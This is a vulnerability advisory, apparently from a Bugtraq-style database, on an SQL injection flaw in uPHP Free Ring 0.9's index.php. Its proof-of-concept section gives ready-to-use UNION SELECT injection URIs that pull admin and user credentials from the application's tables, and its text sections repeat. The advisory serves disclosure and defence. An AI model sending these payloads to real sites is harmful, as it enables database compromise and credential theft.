UPHP Free Ring Index.PHP SQL Injection Vulnerability
BID:23586
Info
UPHP Free Ring Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 23586 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 19 2007 12:00AM |
| Updated: | Apr 23 2007 06:30PM |
| Credit: | Dj7xpl is credited with the discovery of this vulnerability. |
| Vulnerable: |
uPHP uPHP Free Ring 0.9 |
| Not Vulnerable: | |
Discussion
UPHP Free Ring Index.PHP SQL Injection Vulnerability
uPHP Free Ring is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
uPHP Free Ring 0.9 is vulnerable; other versions may also be affected.
uPHP Free Ring is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
uPHP Free Ring 0.9 is vulnerable; other versions may also be affected.
Exploit / POC
UPHP Free Ring Index.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?ring=Sql.Inject
http://www.example.com/index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
http://www.example.com/index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?ring=Sql.Inject
http://www.example.com/index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
http://www.example.com/index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*
Solution / Fix
UPHP Free Ring Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].